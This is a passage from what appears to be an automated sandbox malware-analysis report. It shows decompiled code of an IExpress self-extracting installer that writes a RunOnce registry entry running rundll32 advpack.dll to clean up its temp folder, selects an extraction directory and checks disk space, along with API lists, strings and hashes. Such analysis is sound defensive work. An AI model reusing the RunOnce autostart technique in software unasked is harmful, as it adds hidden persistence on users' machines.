						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x791e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x791e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x791e5);
						if(_t90 != 0) {
							 *0x78580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
							E0007171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E000744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0007658A( &_v268, 0x104, 0x71140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x78530 = _t66;
				goto L23;
			}

0x0007202a
0x00072035
0x0007203c
0x00072041
0x00072050
0x0007205f
0x00072064
0x0007206f
0x0007208c
0x00072094
0x00072257
0x00072266
0x00072266
0x0007209a
0x0007209b
0x0007209d
0x000720aa
0x000720af
0x000720c9
0x000720d1
0x00000000
0x00000000
0x000720d3
0x000720da
0x00000000
0x00000000
0x00000000
0x000720da
0x000720e2
0x00072103
0x0007210e
0x00072116
0x00072122
0x00072128
0x0007212c
0x00072179
0x00072194
0x000721de
0x000721e4
0x00072256
0x00072256
0x00000000
0x00072256
0x00072196
0x00072196
0x0007219c
0x0007219f
0x0007219f
0x000721a1
0x000721a2
0x000721a6
0x000721a8
0x000721b0
0x000721b0
0x000721b2
0x000721b3
0x000721bc
0x000721c7
0x000721cb
0x000721f1
0x000721f6
0x000721fd
0x000721ff
0x000721ff
0x00072204
0x00072213
0x00072218
0x0007221d
0x0007221d
0x00072220
0x00072220
0x00072222
0x00072223
0x00072229
0x0007223d
0x00072249
0x00072250
0x00000000
0x00072250
0x000721d2
0x000721d9
0x00000000
0x000721d9
0x0007213a
0x00072141
0x00072144
0x0007214c
0x00000000
0x00000000
0x00072163
0x00072172
0x00072172
0x00000000
0x00072163
0x000720ea
0x000720f0
0x00000000

APIs

memset.MSVCRT ref: 00072050
memset.MSVCRT ref: 0007205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0007208C

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000720C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000720EA
GetSystemDirectoryA.KERNEL32 ref: 00072103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00072134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072144
GetSystemDirectoryA.KERNEL32 ref: 0007215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0007218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000721C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000721E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0007223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072250

Strings

wextract_cleanup1, xrefs: 000720A5, 000720BE, 000720F0, 00072232
DelNodeRunDLL32, xrefs: 0007212E
advpack.dll, xrefs: 00072109
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000721A8, 00072204
wextract_cleanup%d, xrefs: 0007209E
%s /D:%s, xrefs: 000721FF, 00072210
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000721F6
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00072082

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-4141939531
Opcode ID: a228b318297d589cac2291243d917b676f6fc1b37e5543c087162f264b47eb54
Instruction ID: e697c2edce5da745c51d292ebcd73c9e431a6ebeb0fd56f0a4a6c73874ee157f
Opcode Fuzzy Hash: a228b318297d589cac2291243d917b676f6fc1b37e5543c087162f264b47eb54
Instruction Fuzzy Hash: 4F51F671E40214ABEB209B64DC4DFEA776CFB91700F00C1A8BA4DE6151DA7D9D85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000755A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E000755A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x78004; // 0xa87cf02e
				_v8 = _t28 ^ _t110;
				_t2 = E0007468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0007468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x79a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x78b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x78a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00076517(_t82, 0x7d2, 0, E00073210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x79a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x791e4;
									_t40 = GetTempPathA(0x104, 0x791e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00071781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00076952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0007597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00072630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0007658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x791e4;
																					E00071781(0x791e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00075467(0x791e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00072630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0007597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00075467(0x791e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x791e4;
											_t70 = E00072630(0, 0x791e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x791e4;
												_t71 = E00075467(0x791e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0007597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x78b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00075467(0x78b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E000744B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x79124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x79124 = E00076285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00076CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x000755ab
0x000755b2
0x000755c9
0x000755d5
0x000755d9
0x00075600
0x00075605
0x0007560a
0x0007560c
0x00075638
0x00075641
0x00075643
0x00075645
0x00075645
0x0007564c
0x00075652
0x00075657
0x00075659
0x00075696
0x0007569c
0x0007589f
0x000758a7
0x000758ac
0x000758b3
0x000758b5
0x000756a2
0x000756a2
0x000756a8
0x00000000
0x000756ae
0x000756ae
0x000756b9
0x000756bf
0x000756c1
0x000756f3
0x000756f3
0x00075705
0x0007570a
0x00075711
0x00075717
0x00075724
0x00075726
0x00075729
0x00075730
0x00075737
0x0007573d
0x00075740
0x00000000
0x00000000
0x00000000
0x00000000
0x0007572b
0x0007572b
0x0007572e
0x00075742
0x00075742
0x00075745
0x0007576b
0x0007576b
0x00000000
0x00075747
0x00075747
0x0007574d
0x0007574f
0x00075771
0x00075771
0x00075773
0x00000000
0x00075751
0x00075751
0x00075753
0x00000000
0x00075755
0x0007575b
0x00075760
0x00075762
0x00000000
0x00075764
0x00075764
0x00075769
0x0007577e
0x0007577e
0x00075781
0x00075788
0x0007578d
0x0007578f
0x000757b2
0x000757b8
0x000757bd
0x000757bf
0x000757cd
0x000757cd
0x000757dd
0x000757e3
0x000757ef
0x000757f5
0x000757f8
0x0007580a
0x0007580a
0x000757fa
0x00075802
0x00075802
0x0007580d
0x0007580f
0x00075830
0x00075836
0x0007583d
0x0007584b
0x00075851
0x00075855
0x0007585a
0x0007585c
0x00000000
0x0007585e
0x0007585e
0x00000000
0x0007585e
0x00075811
0x00075817
0x00075819
0x0007581f
0x00000000
0x0007581f
0x00075791
0x00075797
0x0007579c
0x0007579e
0x00000000
0x000757a0
0x000757a9
0x000757ae
0x000757b0
0x00000000
0x00000000
0x00000000
0x00000000
0x000757b0
0x0007579e
0x00000000
0x00000000
0x00000000
0x00075769
0x00075762
0x00075753
0x0007574f
0x00000000
0x00000000
0x00000000
0x0007572e
0x00000000
0x00075864
0x00075864
0x00075864
0x00075717
0x00000000
0x000756c3
0x000756c5
0x000756c9
0x000756ce
0x000756d0
0x00000000
0x000756d6
0x000756d6
0x000756d8
0x000756dd
0x000756df
0x00000000
0x000756e1
0x000756e2
0x000756e4
0x000756e6
0x000756eb
0x000756ed
0x00000000
0x000756f3
0x000756f3
0x00000000
0x0007586c
0x00075878
0x0007587e
0x00075882
0x00075883
0x00075889
0x0007588e
0x0007588e
0x00000000
0x00075896
0x000756ed
0x000756df
0x000756d0
0x000756c1
0x000756a8
0x0007565b
0x0007565b
0x0007565d
0x00075669
0x00075669
0x0007565f
0x0007565f
0x00075665
0x00075667
0x00000000
0x00000000
0x00075667
0x0007566c
0x00075673
0x00075678
0x0007567a
0x0007589b
0x0007589b
0x00075680
0x00075685
0x0007568c
0x00000000
0x0007568c
0x0007567a
0x0007560e
0x00075613
0x0007561a
0x00075620
0x00075626
0x00000000
0x00075626
0x000755db
0x000755e0
0x000755e7
0x000755f1
0x000755f6
0x000755f6
0x000755f6
0x000758b7
0x000758c7

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000755CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00075638
LocalFree.KERNEL32(00000000), ref: 0007564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00075620

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000756B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0007571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00075737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000757CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000757EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00075802

Part of subcall function 00072630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00072654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00075830

Part of subcall function 00076517: FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
Part of subcall function 00076517: LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
Part of subcall function 00076517: DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
Part of subcall function 00076517: FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00075878

Part of subcall function 0007597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000759A8
Part of subcall function 0007597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000759AF

Strings

<None>, xrefs: 00075632
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000756AE, 000756B3, 0007583D
Z, xrefs: 0007570A
A:\, xrefs: 000756F4
msdownld.tmp, xrefs: 000757D3
RUNPROGRAM, xrefs: 000755BD, 00075600

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2692175070
Opcode ID: a5cce6719b407109e5fb9c095dda317233f94624c6bd208b6f4ff01b0da67ce4
Instruction ID: 844bec27ea3b5fea919aa50a94e24f0bab2b1db7dc65d00c6367f2f9af281618
Opcode Fuzzy Hash: a5cce6719b407109e5fb9c095dda317233f94624c6bd208b6f4ff01b0da67ce4
Instruction Fuzzy Hash: DA810770F04A045BEBA4AB649C45BEE72AD9B51302F04C465F58EE2192DFFC8DC1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0007597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0007597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x78004; // 0xa87cf02e
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x79124 = E00076285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000744B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x79a34 & 0x00000008;
							if(( *0x79a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x79a38; // 0x0
								_t110 =  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x79124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0007268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x79a38; // 0x0
							_t110 =  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x79a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000744B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x79124 = E00076285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000744B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x79124 = E00076285();
					_t66 = 0;
					L33:
					return E00076CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0007597d
0x00075988
0x0007598f
0x0007599a
0x000759a6
0x000759a8
0x000759af
0x000759b9
0x000759dd
0x000759e4
0x000759f1
0x000759fe
0x00075a0b
0x00075a13
0x00075a19
0x00075a1b
0x00075ba1
0x00075baf
0x00075bbd
0x00075bd8
0x00075bde
0x00075be3
0x00075bec
0x00075bf0
0x00075bfc
0x00075c02
0x00075c02
0x00075c02
0x00075c04
0x00075c04
0x00000000
0x00075c04
0x00075a27
0x00075a3a
0x00075a46
0x00075a48
0x00075a4a
0x00000000
0x00000000
0x00075a64
0x00075a6a
0x00075a6c
0x00075abc
0x00075ac2
0x00075ac9
0x00075aca
0x00075aca
0x00075acc
0x00075acc
0x00075acf
0x00075ad1
0x00000000
0x00000000
0x00075ad3
0x00075ad6
0x00075ad8
0x00000000
0x00000000
0x00075ada
0x00075adc
0x00075add
0x00075add
0x00075ae0
0x00000000
0x00000000
0x00000000
0x00075ae0
0x00075ae2
0x00075ae4
0x00075ae6
0x00075ae6
0x00075ae6
0x00075ae9
0x00075aeb
0x00075af0
0x00075af6
0x00075af8
0x00075af9
0x00075af9
0x00075afb
0x00000000
0x00000000
0x00075afd
0x00075aff
0x00075b00
0x00075b03
0x00000000
0x00000000
0x00000000
0x00075b03
0x00075b05
0x00075b08
0x00075b20
0x00075b27
0x00075b52
0x00075b52
0x00075b5b
0x00075b62
0x00075b6b
0x00075b6d
0x00075b76
0x00075b7d
0x00075b83
0x00075b7f
0x00075b7f
0x00075b7f
0x00075b6f
0x00075b72
0x00075b72
0x00075b85
0x00075b98
0x00075b9e
0x00075b87
0x00075b8f
0x00075b8f
0x00000000
0x00075b85
0x00075b29
0x00075b33
0x00000000
0x00000000
0x00075b35
0x00075b48
0x00075b4a
0x00000000
0x00075b4a
0x00075b0f
0x00075b16
0x00000000
0x00075b16
0x00075a7c
0x00075a8a
0x00075aa5
0x00075aab
0x00000000
0x000759bb
0x000759c0
0x000759c7
0x000759d1
0x000759d6
0x00075c05
0x00075c14
0x00075c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000759A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 000759AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00075A13
MulDiv.KERNEL32(?,?,00000400), ref: 00075A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00075A64
memset.MSVCRT ref: 00075A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00075A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00075AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00075BFC

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: c5b83ed1ebc4945a80bf0b2f96ec649f4f07e3e0c0d2c1fa4b5cdb4a91a3429b
Instruction ID: 2a2c28f38edbf74370c91888fd096d427a7a7607c1b63d6fe33fd5b1fae6625f
Opcode Fuzzy Hash: c5b83ed1ebc4945a80bf0b2f96ec649f4f07e3e0c0d2c1fa4b5cdb4a91a3429b
Instruction Fuzzy Hash: B271A6B1E0060CAFEB659B20CC85BFA77ACEB48341F4484A9F50DE6141D77C9E858B65

Uniqueness

Uniqueness Score: -1.00%

Function 00074FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

